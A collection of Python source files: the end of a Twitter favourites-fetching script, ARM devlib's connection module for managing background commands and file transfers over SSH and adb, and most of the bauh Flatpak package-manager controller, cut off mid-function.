return dt.astimezone(timezone('Asia/Tokyo'))
if __name__ == '__main__':
user_id = '1212759744'
screen_name = 'kemomimi_oukoku'
twitter = TwitterClient()
# user = twitter.user_from_screen_name(screen_name)
# user_id = user['id_str']
# twitter.show_user(user)
# tweets = twitter.timeline()
tweets = twitter.favlist(user_id)
# twitter.show_tweets(tweets)
# tweets = twitter.add_htmls_embedded(tweets)
print(tweets[0]["favorite_count"])
# print(twitter.issue_request_url())
|
connection.py | # Copyright 2019 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC, abstractmethod
from contextlib import contextmanager
from datetime import datetime
from functools import partial
from weakref import WeakSet
from shlex import quote
from time import monotonic
import os
import signal
import socket
import subprocess
import threading
import time
import logging
from devlib.utils.misc import InitCheckpoint
_KILL_TIMEOUT = 3
def _kill_pgid_cmd(pgid, sig):
return 'kill -{} -{}'.format(sig.value, pgid)
class ConnectionBase(InitCheckpoint):
"""
Base class for all connections.
"""
def __init__(self):
self._current_bg_cmds = WeakSet()
self._closed = False
self._close_lock = threading.Lock()
self.busybox = None
def cancel_running_command(self):
bg_cmds = set(self._current_bg_cmds)
for bg_cmd in bg_cmds:
bg_cmd.cancel()
@abstractmethod
def _close(self):
"""
Close the connection.
The public :meth:`close` method makes sure that :meth:`_close` will
only be called once, and will serialize accesses to it if it happens to
be called from multiple threads at once.
"""
def close(self):
# Locking the closing allows any thread to safely call close() as long
# as the connection can be closed from a thread that is not the one it
# started its life in.
with self._close_lock:
if not self._closed:
self._close()
self._closed = True
# Ideally, that should not be relied upon but that will improve the chances
# of the connection being properly cleaned up when it's not in use anymore.
def __del__(self):
# Since __del__ will be called if an exception is raised in __init__
# (e.g. we cannot connect), we only run close() when we are sure
# __init__ has completed successfully.
if self.initialized:
self.close()
class BackgroundCommand(ABC):
"""
Allows managing a running background command using a subset of the
:class:`subprocess.Popen` API.
Instances of this class can be used as context managers, with the same
semantic as :class:`subprocess.Popen`.
"""
@abstractmethod
def send_signal(self, sig):
"""
Send a POSIX signal to the background command's process group ID
(PGID).
:param signal: Signal to send.
:type signal: signal.Signals
"""
def kill(self):
"""
Send SIGKILL to the background command.
"""
self.send_signal(signal.SIGKILL)
def cancel(self, kill_timeout=_KILL_TIMEOUT):
"""
Try to gracefully terminate the process by sending ``SIGTERM``, then
waiting for ``kill_timeout`` to send ``SIGKILL``.
"""
if self.poll() is None:
self._cancel(kill_timeout=kill_timeout)
@abstractmethod
def _cancel(self, kill_timeout):
"""
Method to override in subclasses to implement :meth:`cancel`.
"""
pass
@abstractmethod
def wait(self):
"""
Block until the background command completes, and return its exit code.
"""
@abstractmethod
def poll(self):
"""
Return exit code if the command has exited, None otherwise.
"""
@property
@abstractmethod
def stdin(self):
"""
File-like object connected to the background's command stdin.
"""
@property
@abstractmethod
def stdout(self):
"""
File-like object connected to the background's command stdout.
"""
@property
@abstractmethod
def stderr(self):
"""
File-like object connected to the background's command stderr.
"""
@property
@abstractmethod
def pid(self):
"""
Process Group ID (PGID) of the background command.
Since the command is usually wrapped in shell processes for IO
redirections, sudo etc, the PID cannot be assumed to be the actual PID
of the command passed by the user. It's is guaranteed to be a PGID
instead, which means signals sent to it as such will target all
subprocesses involved in executing that command.
"""
@abstractmethod
def close(self):
"""
Close all opened streams and then wait for command completion.
:returns: Exit code of the command.
.. note:: If the command is writing to its stdout/stderr, it might be
blocked on that and die when the streams are closed.
"""
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.close()
class PopenBackgroundCommand(BackgroundCommand):
"""
:class:`subprocess.Popen`-based background command.
"""
def __init__(self, popen):
self.popen = popen
def send_signal(self, sig):
return os.killpg(self.popen.pid, sig)
@property
def stdin(self):
return self.popen.stdin
@property
def stdout(self):
return self.popen.stdout
@property
def stderr(self):
return self.popen.stderr
@property
def pid(self):
return self.popen.pid
def wait(self):
return self.popen.wait()
def poll(self):
return self.popen.poll()
def _cancel(self, kill_timeout):
popen = self.popen
os.killpg(os.getpgid(popen.pid), signal.SIGTERM)
try:
popen.wait(timeout=kill_timeout)
except subprocess.TimeoutExpired:
os.killpg(os.getpgid(popen.pid), signal.SIGKILL)
def close(self):
self.popen.__exit__(None, None, None)
return self.popen.returncode
def __enter__(self):
self.popen.__enter__()
return self
def __exit__(self, *args, **kwargs):
self.popen.__exit__(*args, **kwargs)
class ParamikoBackgroundCommand(BackgroundCommand):
"""
:mod:`paramiko`-based background command.
"""
def __init__(self, conn, chan, pid, as_root, stdin, stdout, stderr, redirect_thread):
self.chan = chan
self.as_root = as_root
self.conn = conn
self._pid = pid
self._stdin = stdin
self._stdout = stdout
self._stderr = stderr
self.redirect_thread = redirect_thread
def send_signal(self, sig):
# If the command has already completed, we don't want to send a signal
# to another process that might have gotten that PID in the meantime.
if self.poll() is not None:
return
# Use -PGID to target a process group rather than just the process
# itself
cmd = _kill_pgid_cmd(self.pid, sig)
self.conn.execute(cmd, as_root=self.as_root)
@property
def pid(self):
return self._pid
def wait(self):
return self.chan.recv_exit_status()
def poll(self):
if self.chan.exit_status_ready():
return self.wait()
else:
return None
def _cancel(self, kill_timeout):
self.send_signal(signal.SIGTERM)
# Check if the command terminated quickly
time.sleep(10e-3)
# Otherwise wait for the full timeout and kill it
if self.poll() is None:
time.sleep(kill_timeout)
self.send_signal(signal.SIGKILL)
self.wait()
@property
def stdin(self):
return self._stdin
@property
def stdout(self):
return self._stdout
@property
def stderr(self):
return self._stderr
def close(self):
for x in (self.stdin, self.stdout, self.stderr):
if x is not None:
x.close()
exit_code = self.wait()
thread = self.redirect_thread
if thread:
thread.join()
return exit_code
class AdbBackgroundCommand(BackgroundCommand):
"""
``adb``-based background command.
"""
def __init__(self, conn, adb_popen, pid, as_root):
self.conn = conn
self.as_root = as_root
self.adb_popen = adb_popen
self._pid = pid
def send_signal(self, sig):
self.conn.execute(
_kill_pgid_cmd(self.pid, sig),
as_root=self.as_root,
)
@property
def stdin(self):
return self.adb_popen.stdin
@property
def stdout(self):
return self.adb_popen.stdout
@property
def stderr(self):
return self.adb_popen.stderr
@property
def pid(self):
return self._pid
def wait(self):
return self.adb_popen.wait()
def poll(self):
return self.adb_popen.poll()
def _cancel(self, kill_timeout):
self.send_signal(signal.SIGTERM)
try:
self.adb_popen.wait(timeout=kill_timeout)
except subprocess.TimeoutExpired:
self.send_signal(signal.SIGKILL)
self.adb_popen.kill()
def close(self):
self.adb_popen.__exit__(None, None, None)
return self.adb_popen.returncode
def __enter__(self):
self.adb_popen.__enter__()
return self
def __exit__(self, *args, **kwargs):
self.adb_popen.__exit__(*args, **kwargs)
class TransferManagerBase(ABC):
def _pull_dest_size(self, dest):
if os.path.isdir(dest):
return sum(
os.stat(os.path.join(dirpath, f)).st_size
for dirpath, _, fnames in os.walk(dest)
for f in fnames
)
else:
return os.stat(dest).st_size
return 0
def _push_dest_size(self, dest):
cmd = '{} du -s {}'.format(quote(self.conn.busybox), quote(dest))
out = self.conn.execute(cmd)
try:
return int(out.split()[0])
except ValueError:
return 0
def __init__(self, conn, poll_period, start_transfer_poll_delay, total_timeout):
self.conn = conn
self.poll_period = poll_period
self.total_timeout = total_timeout
self.start_transfer_poll_delay = start_transfer_poll_delay
self.logger = logging.getLogger('FileTransfer')
self.managing = threading.Event()
self.transfer_started = threading.Event()
self.transfer_completed = threading.Event()
self.transfer_aborted = threading.Event()
self.monitor_thread = None
self.sources = None
self.dest = None
self.direction = None
@abstractmethod
def _cancel(self):
pass
def cancel(self, reason=None):
msg = 'Cancelling file transfer {} -> {}'.format(self.sources, self.dest)
if reason is not None:
msg += ' due to \'{}\''.format(reason)
self.logger.warning(msg)
self.transfer_aborted.set()
self._cancel()
@abstractmethod
def isactive(self):
pass
@contextmanager
def manage(self, sources, dest, direction):
try:
self.sources, self.dest, self.direction = sources, dest, direction
m_thread = threading.Thread(target=self._monitor)
self.transfer_completed.clear()
self.transfer_aborted.clear()
self.transfer_started.set()
m_thread.start()
yield self
except BaseException:
self.cancel(reason='exception during transfer')
raise
finally:
self.transfer_completed.set()
self.transfer_started.set()
m_thread.join()
self.transfer_started.clear()
self.transfer_completed.clear()
self.transfer_aborted.clear()
def _monitor(self):
start_t = monotonic()
self.transfer_completed.wait(self.start_transfer_poll_delay)
while not self.transfer_completed.wait(self.poll_period):
if not self.isactive():
self.cancel(reason='transfer inactive')
elif monotonic() - start_t > self.total_timeout:
self.cancel(reason='transfer timed out')
class PopenTransferManager(TransferManagerBase):
def __init__(self, conn, poll_period=30, start_transfer_poll_delay=30, total_timeout=3600):
super().__init__(conn, poll_period, start_transfer_poll_delay, total_timeout)
self.transfer = None
self.last_sample = None
def _cancel(self):
if self.transfer:
self.transfer.cancel()
self.transfer = None
self.last_sample = None
def isactive(self):
size_fn = self._push_dest_size if self.direction == 'push' else self._pull_dest_size
curr_size = size_fn(self.dest)
self.logger.debug('Polled file transfer, destination size {}'.format(curr_size))
active = True if self.last_sample is None else curr_size > self.last_sample
self.last_sample = curr_size
return active
def set_transfer_and_wait(self, popen_bg_cmd):
self.transfer = popen_bg_cmd
self.last_sample = None
ret = self.transfer.wait()
if ret and not self.transfer_aborted.is_set():
raise subprocess.CalledProcessError(ret, self.transfer.popen.args)
elif self.transfer_aborted.is_set():
raise TimeoutError(self.transfer.popen.args)
class SSHTransferManager(TransferManagerBase):
def __init__(self, conn, poll_period=30, start_transfer_poll_delay=30, total_timeout=3600):
super().__init__(conn, poll_period, start_transfer_poll_delay, total_timeout)
self.transferer = None
self.progressed = False
self.transferred = None
self.to_transfer = None
def _cancel(self):
self.transferer.close()
def isactive(self):
progressed = self.progressed
self.progressed = False
msg = 'Polled transfer: {}% [{}B/{}B]'
pc = format((self.transferred / self.to_transfer) * 100, '.2f')
self.logger.debug(msg.format(pc, self.transferred, self.to_transfer))
return progressed
@contextmanager
def manage(self, sources, dest, direction, transferer):
with super().manage(sources, dest, direction):
try:
self.progressed = False
self.transferer = transferer # SFTPClient or SCPClient
yield self
except socket.error as e:
if self.transfer_aborted.is_set():
self.transfer_aborted.clear()
method = 'SCP' if self.conn.use_scp else 'SFTP'
raise TimeoutError('{} {}: {} -> {}'.format(method, self.direction, sources, self.dest))
else:
raise e
def progress_cb(self, *args):
if self.transfer_started.is_set():
self.progressed = True
if len(args) == 3: # For SCPClient callbacks
self.transferred = args[2]
self.to_transfer = args[1]
elif len(args) == 2: # For SFTPClient callbacks
self.transferred = args[0]
self.to_transfer = args[1]
|
controller.py | import os
import re
import traceback
from datetime import datetime
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Set, Type, Tuple, Optional
from packaging.version import Version
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext, UpgradeRequirements, \
UpgradeRequirement, TransactionResult, SoftwareAction
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import PackageHistory, PackageUpdate, SoftwarePackage, PackageSuggestion, \
SuggestionPriority, PackageStatus
from bauh.api.abstract.view import MessageType, FormComponent, SingleSelectComponent, InputOption, SelectViewType, \
ViewComponent, PanelComponent
from bauh.commons import user
from bauh.commons.boot import CreateConfigFile
from bauh.commons.html import strip_html, bold
from bauh.commons.system import ProcessHandler
from bauh.gems.flatpak import flatpak, SUGGESTIONS_FILE, CONFIG_FILE, UPDATES_IGNORED_FILE, CONFIG_DIR, EXPORTS_PATH, \
get_icon_path, VERSION_1_5, VERSION_1_4
from bauh.gems.flatpak.config import FlatpakConfigManager
from bauh.gems.flatpak.constants import FLATHUB_API_URL
from bauh.gems.flatpak.model import FlatpakApplication
from bauh.gems.flatpak.worker import FlatpakAsyncDataLoader, FlatpakUpdateLoader
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.000Z'
RE_INSTALL_REFS = re.compile(r'\d+\)\s+(.+)')
class FlatpakManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(FlatpakManager, self).__init__(context=context)
self.i18n = context.i18n
self.api_cache = context.cache_factory.new(None)
self.category_cache = context.cache_factory.new(None)
context.disk_loader_factory.map(FlatpakApplication, self.api_cache)
self.enabled = True
self.http_client = context.http_client
self.suggestions_cache = context.cache_factory.new(None)
self.logger = context.logger
self.configman = FlatpakConfigManager()
def get_managed_types(self) -> Set["type"]:
return {FlatpakApplication}
def _map_to_model(self, app_json: dict, installed: bool, disk_loader: DiskCacheLoader, internet: bool = True) -> FlatpakApplication:
app = FlatpakApplication(**app_json, i18n=self.i18n)
app.installed = installed
api_data = self.api_cache.get(app_json['id'])
expired_data = api_data and api_data.get('expires_at') and api_data['expires_at'] <= datetime.utcnow()
if not api_data or expired_data:
if not app.runtime:
if disk_loader:
disk_loader.fill(app) # preloading cached disk data
if internet:
FlatpakAsyncDataLoader(app=app, api_cache=self.api_cache, manager=self,
context=self.context, category_cache=self.category_cache).start()
else:
app.fill_cached_data(api_data)
app.status = PackageStatus.READY
return app
def _get_search_remote(self) -> str:
remotes = flatpak.list_remotes()
if remotes['system']:
remote_level = 'system'
elif remotes['user']:
remote_level = 'user'
else:
remote_level = 'user'
ProcessHandler().handle_simple(flatpak.set_default_remotes(remote_level))
return remote_level
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url:
return SearchResult([], [], 0)
remote_level = self._get_search_remote()
res = SearchResult([], [], 0)
apps_found = flatpak.search(flatpak.get_version(), words, remote_level)
if apps_found:
already_read = set()
installed_apps = self.read_installed(disk_loader=disk_loader, internet_available=True).installed
if installed_apps:
for app_found in apps_found:
for installed_app in installed_apps:
if app_found['id'] == installed_app.id:
res.installed.append(installed_app)
already_read.add(app_found['id'])
if len(apps_found) > len(already_read):
for app_found in apps_found:
if app_found['id'] not in already_read:
res.new.append(self._map_to_model(app_found, False, disk_loader))
res.total = len(res.installed) + len(res.new)
return res
def _add_updates(self, version: Version, output: list):
output.append(flatpak.list_updates_as_str(version))
def read_installed(self, disk_loader: Optional[DiskCacheLoader], limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
version = flatpak.get_version()
updates = []
if internet_available:
thread_updates = Thread(target=self._add_updates, args=(version, updates))
thread_updates.start()
else:
thread_updates = None
installed = flatpak.list_installed(version)
models = []
if installed:
update_map = None
if thread_updates:
thread_updates.join()
update_map = updates[0]
for app_json in installed:
model = self._map_to_model(app_json=app_json, installed=True,
disk_loader=disk_loader, internet=internet_available)
model.update = None
models.append(model)
if update_map and (update_map['full'] or update_map['partial']):
if version >= VERSION_1_4:
update_id = '{}/{}/{}'.format(app_json['id'], app_json['branch'], app_json['installation'])
if update_map['full'] and update_id in update_map['full']:
model.update = True
if update_map['partial']:
for partial in update_map['partial']:
partial_data = partial.split('/')
if app_json['id'] in partial_data[0] and\
app_json['branch'] == partial_data[1] and\
app_json['installation'] == partial_data[2]:
partial_model = model.gen_partial(partial.split('/')[0])
partial_model.update = True
models.append(partial_model)
else:
model.update = '{}/{}'.format(app_json['installation'], app_json['ref']) in update_map['full']
if models:
ignored = self._read_ignored_updates()
if ignored:
for model in models:
if model.get_update_ignore_key() in ignored:
model.updates_ignored = True
return SearchResult(models, None, len(models))
def downgrade(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher) -> bool:
if not self._make_exports_dir(watcher):
return False
watcher.change_progress(10)
watcher.change_substatus(self.i18n['flatpak.downgrade.commits'])
history = self.get_history(pkg, full_commit_str=True)
# downgrade is not possible if the app current commit in the first one:
if history.pkg_status_idx == len(history.history) - 1:
watcher.show_message(self.i18n['flatpak.downgrade.impossible.title'],
self.i18n['flatpak.downgrade.impossible.body'].format(bold(pkg.name)),
MessageType.ERROR)
return False
commit = history.history[history.pkg_status_idx + 1]['commit']
watcher.change_substatus(self.i18n['flatpak.downgrade.reverting'])
watcher.change_progress(50)
success, _ = ProcessHandler(watcher).handle_simple(flatpak.downgrade(pkg.ref,
commit,
pkg.installation,
root_password))
watcher.change_progress(100)
return success
def clean_cache_for(self, pkg: FlatpakApplication):
super(FlatpakManager, self).clean_cache_for(pkg)
self.api_cache.delete(pkg.id)
def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> bool:
flatpak_version = flatpak.get_version()
if not self._make_exports_dir(watcher):
return False
for req in requirements.to_upgrade:
watcher.change_status("{} {} ({})...".format(self.i18n['manage_window.status.upgrading'], req.pkg.name, req.pkg.version))
related, deps = False, False
ref = req.pkg.ref
if req.pkg.partial and flatpak_version < VERSION_1_5:
related, deps = True, True
ref = req.pkg.base_ref
try:
res, _ = ProcessHandler(watcher).handle_simple(flatpak.update(app_ref=ref,
installation=req.pkg.installation,
related=related,
deps=deps))
watcher.change_substatus('')
if not res:
self.logger.warning("Could not upgrade '{}'".format(req.pkg.id))
return False
except:
watcher.change_substatus('')
self.logger.error("An error occurred while upgrading '{}'".format(req.pkg.id))
traceback.print_exc()
return False
watcher.change_substatus('')
return True
def uninstall(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
if not self._make_exports_dir(watcher):
return TransactionResult.fail()
uninstalled, _ = ProcessHandler(watcher).handle_simple(flatpak.uninstall(pkg.ref, pkg.installation))
if uninstalled:
if self.suggestions_cache:
self.suggestions_cache.delete(pkg.id)
self.revert_ignored_update(pkg)
return TransactionResult(success=True, installed=None, removed=[pkg])
return TransactionResult.fail()
def get_info(self, app: FlatpakApplication) -> dict:
if app.installed:
version = flatpak.get_version()
id_ = app.base_id if app.partial and version < VERSION_1_5 else app.id
app_info = flatpak.get_app_info_fields(id_, app.branch, app.installation)
if app.partial and version < VERSION_1_5:
app_info['id'] = app.id
app_info['ref'] = app.ref
app_info['name'] = app.name
app_info['type'] = 'runtime' if app.runtime else 'app'
app_info['description'] = strip_html(app.description) if app.description else ''
if app.installation:
app_info['installation'] = app.installation
if app_info.get('installed'):
app_info['installed'] = app_info['installed'].replace('?', ' ')
return app_info
else:
res = self.http_client.get_json('{}/apps/{}'.format(FLATHUB_API_URL, app.id))
if res:
if res.get('categories'):
res['categories'] = [c.get('name') for c in res['categories']]
for to_del in ('screenshots', 'iconMobileUrl', 'iconDesktopUrl'):
if res.get(to_del):
del res[to_del]
for to_strip in ('description', 'currentReleaseDescription'):
if res.get(to_strip):
res[to_strip] = strip_html(res[to_strip])
for to_date in ('currentReleaseDate', 'inStoreSinceDate'):
if res.get(to_date):
try:
res[to_date] = datetime.strptime(res[to_date], DATE_FORMAT)
except:
self.context.logger.error('Could not convert date string {} as {}'.format(res[to_date], DATE_FORMAT))
pass
return res
else:
return {}
def get_history(self, pkg: FlatpakApplication, full_commit_str: bool = False) -> PackageHistory:
pkg.commit = flatpak.get_commit(pkg.id, pkg.branch, pkg.installation)
pkg_commit = pkg.commit if pkg.commit else None
if pkg_commit and not full_commit_str:
pkg_commit = pkg_commit[0:8]
commits = flatpak.get_app_commits_data(pkg.ref, pkg.origin, pkg.installation, full_str=full_commit_str)
status_idx = 0
commit_found = False
if pkg_commit is None and len(commits) > 1 and commits[0]['commit'] == '(null)':
del commits[0]
pkg_commit = commits[0]
commit_found = True
if not commit_found:
for idx, data in enumerate(commits):
if data['commit'] == pkg_commit:
status_idx = idx
commit_found = True
break
if not commit_found and pkg_commit and commits[0]['commit'] == '(null)':
commits[0]['commit'] = pkg_commit
return PackageHistory(pkg=pkg, history=commits, pkg_status_idx=status_idx)
def _make_exports_dir(self, watcher: ProcessWatcher) -> bool:
if not os.path.exists(EXPORTS_PATH):
self.logger.info("Creating dir '{}'".format(EXPORTS_PATH))
watcher.print('Creating dir {}'.format(EXPORTS_PATH))
try:
Path(EXPORTS_PATH).mkdir(parents=True, exist_ok=True)
except:
watcher.print('Error while creating the directory {}'.format(EXPORTS_PATH))
return False
return True
def install(self, pkg: FlatpakApplication, root_password: str, disk_loader: DiskCacheLoader, watcher: ProcessWatcher) -> TransactionResult:
flatpak_config = self.configman.get_config()
install_level = flatpak_config['installation_level']
if install_level is not None:
self.logger.info("Default Flaptak installation level defined: {}".format(install_level))
if install_level not in ('user', 'system'):
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['flatpak.install.bad_install_level.body'].format(field=bold('installation_level'),
file=bold(CONFIG_FILE)),
type_=MessageType.ERROR)
return TransactionResult(success=False, installed=[], removed=[])
pkg.installation = install_level
else:
user_level = watcher.request_confirmation(title=self.i18n['flatpak.install.install_level.title'],
body=self.i18n['flatpak.install.install_level.body'].format(bold(pkg.name)),
confirmation_label=self.i18n['no'].capitalize(),
deny_label=self.i18n['yes'].capitalize())
pkg.installation = 'user' if user_level else 'system'
remotes = flatpak.list_remotes()
handler = ProcessHandler(watcher)
if pkg.installation == 'user' and not remotes['user']:
handler.handle_simple(flatpak.set_default_remotes('user'))
elif pkg.installation == 'system' and not remotes['system']:
if user.is_root():
handler.handle_simple(flatpak.set_default_remotes('system'))
else:
valid, user_password = watcher.request_root_password()
if not valid:
watcher.print('Operation aborted')
return TransactionResult(success=False, installed=[], removed=[])
else:
if not handler.handle_simple(flatpak.set_default_remotes('system', user_password))[0]:
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['flatpak.remotes.system_flathub.error'],
type_=MessageType.ERROR)
watcher.print("Operation cancelled")
return TransactionResult(success=False, installed=[], removed=[])
# retrieving all installed so it will be possible to know the additional installed runtimes after the operation succeeds
flatpak_version = flatpak.get_version()
installed = flatpak.list_installed(flatpak_version)
installed_by_level = {'{}:{}:{}'.format(p['id'], p['name'], p['branch']) for p in installed if p['installation'] == pkg.installation} if installed else None
if not self._make_exports_dir(handler.watcher):
return TransactionResult(success=False, installed=[], removed=[])
installed, output = handler.handle_simple(flatpak.install(str(pkg.id), pkg.origin, pkg.installation))
if not installed and 'error: No ref chosen to resolve matches' in output:
ref_opts = RE_INSTALL_REFS.findall(output)
if ref_opts and len(ref_opts) > 1:
view_opts = [InputOption(label=o, value=o.strip()) for o in ref_opts if o]
ref_select = SingleSelectComponent(type_=SelectViewType.RADIO, options=view_opts, default_option=view_opts[0], label='')
if watcher.request_confirmation(title=self.i18n['flatpak.install.ref_choose.title'],
body=self.i18n['flatpak.install.ref_choose.body'].format(bold(pkg.name)),
components=[ref_select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
ref = ref_select.get_selected()
installed, output = handler.handle_simple(flatpak.install(ref, pkg.origin, pkg.installation))
pkg.ref = ref
pkg.runtime = 'runtime' in ref
else:
watcher.print('Aborted by the user')
return TransactionResult.fail()
else:
return TransactionResult.fail()
if installed:
try:
fields = flatpak.get_fields(str(pkg.id), pkg.branch, ['Ref', 'Branch'])
if fields:
pkg.ref = fields[0]
pkg.branch = fields[1]
except:
traceback.print_exc()
if installed:
new_installed = [pkg]
current_installed = flatpak.list_installed(flatpak_version)
current_installed_by_level = [p for p in current_installed if p['installation'] == pkg.installation] if current_installed else None
if current_installed_by_level and (not installed_by_level or len(current_installed_by_level) > len(installed_by_level) + 1):
pkg_key = '{}:{}:{}'.format(pkg.id, pkg.name, pkg.branch)
net_available = self.context.is_internet_available()
for p in current_installed_by_level:
current_key = '{}:{}:{}'.format(p['id'], p['name'], p['branch'])
if current_key != pkg_key and (not installed_by_level or current_key not in installed_by_level):
new_installed.append(self._map_to_model(app_json=p, installed=True,
disk_loader=disk_loader, internet=net_available))
return TransactionResult(success=installed, installed=new_installed, removed=[])
else:
return TransactionResult.fail()
def is_enabled(self):
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
return flatpak.is_installed()
def requires_root(self, action: SoftwareAction, pkg: FlatpakApplication) -> bool:
return action == SoftwareAction.DOWNGRADE and pkg.installation == 'system'
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
CreateConfigFile(taskman=task_manager, configman=self.configman, i18n=self.i18n,
task_icon_path=get_icon_path(), logger=self.logger).start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
updates = []
installed = self.read_installed(None, internet_available=internet_available).installed
to_update = [p for p in installed if p.update and not p.is_update_ignored()]
if to_update:
loaders = []
for app in to_update:
if app.is_application():
loader = FlatpakUpdateLoader(app=app, http_client=self.context.http_client)
loader.start()
loaders.append(loader)
for loader in loaders:
loader.join()
for app in to_update:
updates.append(PackageUpdate(pkg_id='{}:{}:{}'.format(app.id, app.branch, app.installation),
pkg_type='Flatpak',
name=app.name,
version=app.version))
return updates
def list_warnings(self, internet_available: bool) -> List[str]:
return []
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
cli_version = flatpak.get_version()
res = []
self.logger.info("Downloading the suggestions file {}".format(SUGGESTIONS_FILE))
file = self.http_client.get(SUGGESTIONS_FILE)
if not file or not file.text:
self.logger.warning("No suggestion found in {}".format(SUGGESTIONS_FILE))
return res
else:
self.logger.info("Mapping suggestions")
remote_level = self._get_search_remote()
installed = {i.id for i in self.read_installed(disk_loader=None).installed} if filter_installed else None
for line in file.text.split('\n'):
if line:
if limit <= 0 or len(res) < limit:
sug = line.split('=')
appid = sug[1].strip()
if installed and appid in installed:
continue
priority = SuggestionPriority(int(sug[0]))
cached_sug = self.suggestions_cache.get(appid)
if cached_sug:
res.append(cached_sug)
else:
app_json = flatpak.search(cli_version, appid, remote_level, app_id=True)
if app_json:
model = PackageSuggestion(self._map_to_model(app_json[0], False, None), priority)
self.suggestions_cache.add(appid, model)
res.append(model)
else:
break
res.sort(key=lambda s: s.priority.value, reverse=True)
return res
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: FlatpakApplication):
flatpak.run(str(pkg.id))
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
screenshots_url = '{}/apps/{}'.format(FLATHUB_API_URL, pkg.id)
urls = []
try:
res = self.http_client.get_json(screenshots_url)
if res and res.get('screenshots'):
for s in res['screenshots']:
if s.get('imgDesktopUrl'):
urls.append(s['imgDesktopUrl'])
except Exception as e:
if e.__class__.__name__ == 'JSONDecodeError':
self.context.logger.error("Could not decode json from '{}'".format(screenshots_url))
else:
traceback.print_exc()
return urls
def get_settings(self, screen_width: int, screen_height: int) -> ViewComponent:
fields = []
flatpak_config = self.configman.get_config()
install_opts = [InputOption(label=self.i18n['flatpak.config.install_level.system'].capitalize(),
value='system',
tooltip=self.i18n['flatpak.config.install_level.system.tip']),
InputOption(label=self.i18n['flatpak.config.install_level.user'].capitalize(),
value='user',
tooltip=self.i18n['flatpak.config.install_level.user.tip']),
InputOption(label=self.i18n['ask'].capitalize(),
value=None,
tooltip=self.i18n['flatpak.config.install_level.ask.tip'].format(app=self.context.app_name))]
fields.append(SingleSelectComponent(label=self.i18n['flatpak.config.install_level'],
options=install_opts,
default_option=[o for o in install_opts if o.value == flatpak_config['installation_level']][0],
max_per_line=len(install_opts),
max_width=floor(screen_width * 0.22),
type_=SelectViewType.RADIO))
return PanelComponent([FormComponent(fields, self.i18n['installation'].capitalize())])
def save_settings(self, component: PanelComponent) -> Tuple[bool, Optional[List[str]]]:
flatpak_config = self.configman.get_config()
flatpak_config['installation_level'] = component.components[0].components[0].get_selected()
try:
self.configman.save_config(flatpak_config)
return True, None
except:
return False, [traceback.format_exc()]
def get_upgrade_requirements(self, pkgs: List[FlatpakApplication], root_password: str, watcher: ProcessWatcher) -> UpgradeRequirements:
flatpak_version = flatpak.get_version()
user_pkgs, system_pkgs = [], []
for pkg in pkgs:
if pkg.installation == 'user':
user_pkgs.append(pkg)
else:
system_pkgs.append(pkg)
for apps_by_install in ((user_pkgs, 'user'), (system_pkgs, 'system')):
if apps_by_install[0]:
sizes = flatpak.map_update_download_size([str(p.id) for p in apps_by_install[0]], apps_by_install[1], flatpak_version)
if sizes:
for p in apps_by_install[0]:
p.size = sizes.get(str(p.id))
to_update = [UpgradeRequirement(pkg=p, extra_size=p.size, required_size=p.size) for p in self.sort_update_order(pkgs)]
return UpgradeRequirements(None, None, to_update, [])
def sort_update_order(self, pkgs: List[FlatpakApplication]) -> List[FlatpakApplication]:
partials, runtimes, apps = [], [], []
for p in pkgs:
if p.runtime:
if p.partial:
partials.append(p)
else:
runtimes.append(p)
else:
apps.append(p)
if not runtimes:
return [*partials, *apps]
elif partials:
all_runtimes = []
for runtime in runtimes:
for partial in partials:
if partial.installation == runtime.installation and partial.base_id == runtime.id:
all_runtimes.append(partial)
break
all_runtimes.append(runtime)
return [*all_runtimes, *apps]
else:
return [*runtimes, *apps]
def _read_ignored_updates(self) -> Set[str]:
ignored = set()
if os.path.exists(UPDATES_IGNORED_FILE):
with open(UPDATES_IGNORED_FILE) as f:
ignored_txt = f.read()
for l in ignored_txt.split('\n'):
if l:
line_clean = l.strip()
if line_clean:
ignored.add(line_clean)
return ignored
def _write_ignored_updates(self, keys: Set[str]):
Path(CONFIG_DIR).mkdir(parents=True, exist_ok=True)
ignored_list = [*keys]
ignored_list.sort()
with open(UPDATES_IGNORED_FILE, 'w+') as f:
if ignored_list:
for ignored in ignored_list:
f.write('{}\n'.format(ignored))
else:
f.write('')
def ignore_update(self, pkg: FlatpakApplication):
ignored_keys = self._read_ignored_updates()
pkg_key = pkg.get_update_ignore_key()
if pkg_key not in ignored_keys:
ignored_keys.add(pkg_key)
self._write_ignored_updates(ignored_keys)
pkg.updates_ignored = True
def revert_ignored_update(self, pkg: FlatpakApplication):
ignored_keys = self._read_ignored_updates()
if ignored_keys:
